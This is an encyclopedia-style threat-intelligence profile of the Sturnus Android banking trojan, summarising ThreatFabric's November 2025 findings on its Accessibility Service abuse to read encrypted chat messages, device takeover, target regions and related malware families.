Sturnus¶
Sturnus is a privately operated Android banking trojan discovered by ThreatFabric in November 2025. Unlike most modern Android banking malware sold as MaaS, Sturnus appears to be operated exclusively by its developers. Its most notable capability is the interception of content from encrypted messaging apps, including WhatsApp, Telegram, and Signal, by reading screen content via the Accessibility Service after messages are decrypted on-device. This technique completely sidesteps end-to-end encryption without needing to break any cryptographic protocol.
Overview¶
| Attribute | Details |
|---|---|
| First Seen | November 2025 |
| Status | Active, in evaluation/tuning phase |
| Type | Banking trojan, device takeover |
| Attribution | Privately operated (not MaaS) |
| Distribution | Unknown (under investigation) |
Origin and Lineage¶
Sturnus has no known code lineage to existing Android banking trojan families. ThreatFabric's analysis identifies it as an independently developed project. The private operation model sets it apart from the dominant MaaS trend in the Android banking malware ecosystem, where families like Octo, Hook, and Medusa are rented to affiliates. Sturnus operators appear to control the full attack chain themselves, from development to deployment to fraud execution.
At the time of discovery, ThreatFabric assessed Sturnus as being in an evaluation or tuning phase, suggesting the operators are refining their techniques before scaling operations.
Distribution¶
Distribution vectors have not been publicly documented in detail. ThreatFabric's initial disclosure focused on the malware's post-installation capabilities rather than delivery mechanisms. Given the private operational model, distribution is likely targeted rather than broad, possibly through spear-phishing or social engineering campaigns directed at specific victims.
Capabilities¶
Core Features¶
| Capability | Implementation |
|---|---|
| Encrypted message capture | Reads screen content via Accessibility Service after decryption occurs on-device |
| Device takeover | Full remote control of infected devices |
| Text injection | Injects text into fields without physical interaction |
| Screen blackout | Blacks out device screen during fraud operations to hide activity |
| Accessibility abuse | Leverages Accessibility Service for screen reading, input simulation, and overlay detection |
Encrypted Messaging Interception¶
The signature capability of Sturnus is its approach to capturing content from end-to-end encrypted messaging applications. Rather than attempting to break the encryption itself, Sturnus exploits a fundamental reality of encrypted messaging: messages must be decrypted on the device for the user to read them. Once decrypted and displayed on screen, the Accessibility Service can read the content just as it would read any other on-screen text.
ThreatFabric documented that Sturnus targets:
- WhatsApp: Captures message content after rendering
- Telegram: Reads decrypted messages from the screen
- Signal: Intercepts displayed message content
This technique is not a cryptographic attack. It is an on-device content capture that operates after the encryption layer has already done its job. The Accessibility Service provides a legitimate API for reading screen content, originally designed for assistive technology, and Sturnus repurposes it for surveillance. For more on how Android malware abuses this permission, see Accessibility Abuse.
Device Takeover¶
Sturnus provides full device takeover capability, allowing operators to:
- Navigate the device remotely as if holding it
- Inject text into any input field without physical interaction
- Black out the device screen during fraud operations so the victim sees nothing
- Execute banking fraud while the device appears powered off or inactive
The screen blackout technique is shared with other device takeover trojans like Octo and Hook, where the operator dims brightness to zero and displays a black overlay to mask remote activity.
Technical Details¶
C2 Communication¶
Technical details of Sturnus's C2 infrastructure have not been fully disclosed by ThreatFabric in the initial publication. Further technical indicators may emerge as the family matures beyond its current evaluation phase.
Anti-Analysis¶
As a privately operated trojan still in its tuning phase, detailed anti-analysis techniques have not yet been extensively documented. The private operation model itself serves as a form of evasion, as the limited sample distribution makes it harder for security vendors to obtain and analyze specimens compared to widely distributed MaaS families.
Target Regions¶
| Region | Status |
|---|---|
| Southern Europe | Primary target region |
| Central Europe | Primary target region |
ThreatFabric's report identifies Southern and Central Europe as the current target geography. The specific financial institutions targeted have not been publicly enumerated.
Notable Campaigns¶
November 2025: ThreatFabric publishes the discovery of Sturnus, highlighting its ability to capture content from encrypted messaging apps by reading screen content via Accessibility Service. The trojan is assessed as being in an evaluation/tuning phase with a private operational model targeting Southern and Central European victims.
Related Families¶
Sturnus joins a growing set of Android banking trojans with full device takeover capability. Octo pioneered accessible remote control through MediaProjection screen streaming. Hook built on the Cerberus/Ermac lineage to offer VNC-based remote access. Medusa combines screen streaming with keylogging. What distinguishes Sturnus is the explicit focus on encrypted messaging content capture, a capability that other families could theoretically implement but have not prioritized as a core feature.
The encrypted messaging interception technique represents a broader trend in mobile malware: rather than attacking the encryption protocol, attackers target the endpoints where data exists in plaintext. This is the same principle behind SparkCat and SpyAgent stealing cryptocurrency seed phrases via OCR from device photos, targeting the moment when sensitive data is visible rather than when it is protected in transit.